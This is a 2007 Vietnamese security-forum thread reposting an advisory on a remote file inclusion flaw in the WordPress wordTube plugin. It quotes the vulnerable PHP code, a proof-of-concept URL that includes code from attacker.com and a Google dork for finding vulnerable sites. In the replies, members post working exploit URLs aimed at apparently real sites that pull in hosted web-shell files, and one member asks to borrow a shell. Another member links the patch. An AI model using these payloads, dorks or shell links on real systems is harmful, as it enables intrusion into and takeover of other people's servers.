banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits wordpress plugins - Remote File Inclusion (High)  XML
  [Announcement]   wordpress plugins - Remote File Inclusion (High) 27/07/2007 04:51:21 (+0700) | #1 | 74143
L0ng3ta
Locked

[Minus]    0    [Plus]
Joined: 17/09/2002 13:47:43
Messages: 264
Location: Địa cầu
Offline
[Profile] [PM]
http://securityreason.com/securityalert/2660

Vulnerability:
~~~~~~~~~~~~~
- Invalid include function at wordtube-button.php :

----------------wordtube-button.php-------------------
...

*/
// get and set path of function

if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');
...
----------------------------------------------------------------

Input passed to the "wpPATH" parameter in
wordtube-button.php is not properly verified before being used to
include files.
This can be exploited to include arbitrary files from local or
external resources.
Successful exploitation requires that
"register_globals" is enabled.

Poc/Exploit:
~~~~~~~~~

http://www.target.com/wp-content/plugins/wordtube/wordtube-button
.php?wpPATH=http://attacker.com/evil?


Google dork:
~~~~~~~~~
inurl:/plugins/wordtube

Solution:
~~~~~~

- Edit the source code to ensure that input is properly
verified.
- Turn off register_globals
- use the latest version

===================

cái này lâu rồi nhưng search lại vẫn dính đầy.

http://xxx.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sgstars.tripod.com/shell.txt?

@Đã sửa link ...sorry.
[Up] [Print Copy]
  [Question]   wordpress plugins - Remote File Inclusion (High) 28/07/2007 08:35:25 (+0700) | #2 | 74499
184
Member

[Minus]    0    [Plus]
Joined: 14/02/2004 04:27:34
Messages: 99
Location: Bộ Quốc Phòng
Offline
[Profile] [PM] [Email] [Yahoo!]
ai có link shell cho mượn cái nhẩy :cry:
[Up] [Print Copy]
  [Question]   wordpress plugins - Remote File Inclusion (High) 28/07/2007 10:30:45 (+0700) | #3 | 74528
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
http://oakviewhomes.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://it-more.net/coolkid.txt? smilie) smilie-)) . Xài source code free là vậy đó, bị hack lúc nèo ko hay ^^
[Up] [Print Copy]
  [Question]   wordpress plugins - Remote File Inclusion (High) 28/07/2007 10:43:32 (+0700) | #4 | 74531
L0ng3ta
Locked

[Minus]    0    [Plus]
Joined: 17/09/2002 13:47:43
Messages: 264
Location: Địa cầu
Offline
[Profile] [PM]
Lưu ý để tránh nhưng người phá phách nhưng chưa thực sự ý thức và hiểu rõ vấn đề làm ơn lần sau đừng nên đưa shell lên như thế.
[Up] [Print Copy]
  [Question]   wordpress plugins - Remote File Inclusion (High) 28/07/2007 10:51:31 (+0700) | #5 | 74536
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
Lưu ý để tránh nhưng người phá phách nhưng chưa thực sự ý thức và hiểu rõ vấn đề làm ơn lần sau đừng nên đưa shell lên như thế. 

thì để cho bạn đó nghịch được ko đã chứ bro ^^.
[Up] [Print Copy]
  [Question]   wordpress plugins - Remote File Inclusion (High) 28/07/2007 10:53:16 (+0700) | #6 | 74537
[Avatar]
gsmth
Elite Member

[Minus]    0    [Plus]
Joined: 15/02/2007 13:25:36
Messages: 749
Offline
[Profile] [PM] [WWW] [Yahoo!]

minhquan1712 wrote:
http://oakviewhomes.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://it-more.net/coolkid.txt? smilie) smilie-)) . Xài source code free là vậy đó, bị hack lúc nèo ko hay ^^ 

HVA cũng đang xài "source code free" đó smilie)
Remote File Inclusion chỉ xảy ra cho wordpress có dùng wordtube plugin bản cũ, chưa được fix lỗi. Wordtube có bản vá lỗi, và có thể tìm thấy tại:
http://wordpress.org/extend/plugins/wordtube/
http://alexrabe.boelinger.com/?page_id=20
[Up] [Print Copy]
  [Question]   wordpress plugins - Remote File Inclusion (High) 29/07/2007 05:50:05 (+0700) | #7 | 74731
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
HVA cũng đang xài "source code free" đó  

nhưng chẳng phải là bro conmale đã nói là jForum của HVA khác khá nhiều với bản gốc sao?Tức là đã wa nhiều bước thay đổi mã nguồn để nâng tính bảo mật lên rồi ^^.
[Up] [Print Copy]
  [Question]   wordpress plugins - Remote File Inclusion (High) 05/08/2007 01:38:03 (+0700) | #8 | 76855
bmc_smile
Member

[Minus]    0    [Plus]
Joined: 03/08/2007 22:59:20
Messages: 5
Offline
[Profile] [PM]
tại lười vá lỗi nên bị thôi
@minhquan1712: ko phải free mà củ chuối đâu , dùng bản thương mại vẫn die bình thường nếu ko vá lỗi giống hồi HVA dùng IPB. Nên mong bạn đừng có suy nghĩ lệch lạc như thế. (nói nhỏ, bản VBB của bạn mình check thấy là hàng null đấy ~.~).
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|